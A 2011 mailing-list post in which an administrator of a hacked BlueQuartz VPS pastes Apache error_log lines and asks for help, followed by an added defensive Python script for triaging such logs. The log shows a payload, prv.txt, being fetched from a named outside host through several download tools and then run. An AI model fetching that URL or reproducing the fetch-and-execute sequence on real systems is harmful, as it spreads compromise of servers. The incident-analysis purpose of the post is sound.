[BlueOnyx:08816] vps hacked

Steffan general at ziggo.nl
Thu Oct 13 07:07:29 -05 2011


I still have a client with a BlueQuartz server (VPS).

This morning the virtual server was hacked.

I looked in the logs and found this in /var/log/httpd/error_log:

[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40--  http://rapha.altervista.org/prv.txt
           => `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]

    0K .......... .......... .......                         100% 1015.53 KB/s

00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]

sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M 14 28039   14  4097    0     0  98324      0 --:--:-- --:--:-- --:--:-- 98324^M100 28039  100 28039    0     0   403k      0 --:--:-- --:--:-- --:--:--  899k
sh: line 3: prv.txt: command not found
--00:07:40--  http://rapha.altervista.org/prv.txt
           => `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]

    0K .......... .......... .......                         100% 1020.34 KB/s

00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]

sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
^M  4 28039    4  1201    0     0  42493      0 --:--:-- --:--:-- --:--:-- 42493^M100 28039  100 28039    0     0   507k      0 --:--:-- --:--:-- --:--:-- 1048k
sh: line 3: prv.txt: command not found

 

I don't see any admin logins.

How can I find out what happened?
I don't see anything weird in the access log or message log.

Thanks, Steffan
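
Added example, not part of the original post: Apache prefixes its own error_log entries with a bracketed timestamp, while stderr from any program the web server process starts is written to the same file without one, so the unprefixed wget and `sh:` lines are the ones to isolate and line up against the access log. This Python script separates the two kinds of line and lists downloads and shell errors; `triage`, the patterns and the sample (placeholder host and client IP) are constructed for illustration.

```python
import re
import sys
from collections import Counter

# Apache 2.x error_log entries start with "[Day Mon DD HH:MM:SS YYYY] [level]".
APACHE_ENTRY = re.compile(r"^\[(\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4})\] \[\w+\]")
# Banner that older wget versions print to stderr: "--HH:MM:SS--  URL"
WGET_BANNER = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
# Error messages from a shell: "sh: line N: <word>: <reason>"
SHELL_ERROR = re.compile(r"^sh: line \d+: (.+): (command not found|No such file or directory)$")

# Constructed sample modelled on the excerpt in the post; host and client IP are placeholders.
SAMPLE = """\
[Wed Oct 12 00:07:13 2011] [error] [client 192.0.2.10] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40--  http://files.example.invalid/prv.txt
00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 3: prv.txt: command not found
--00:07:40--  http://files.example.invalid/prv.txt
sh: line 1: fetch: command not found
""".splitlines()


def triage(lines):
    """Collect output in an error_log that was not written by Apache itself."""
    report = {"stray": 0, "fetches": [], "shell_errors": Counter()}
    last_entry = None  # timestamp of the closest preceding Apache entry
    for line in lines:
        line = line.rstrip("\r\n")
        if not line.strip():
            continue
        entry = APACHE_ENTRY.match(line)
        if entry:
            last_entry = entry.group(1)
            continue
        report["stray"] += 1
        banner = WGET_BANNER.match(line)
        error = SHELL_ERROR.match(line)
        if banner:
            report["fetches"].append((last_entry, banner.group(1), banner.group(2)))
        elif error:
            report["shell_errors"][(error.group(1), error.group(2))] += 1
    return report


if __name__ == "__main__":  # usage: script.py /var/log/httpd/error_log
    source = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE
    print(triage(source))
```

The Apache timestamp attached to each download is only a lower bound; the wget clock time is what to search for in the access log when looking for the request that triggered it.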
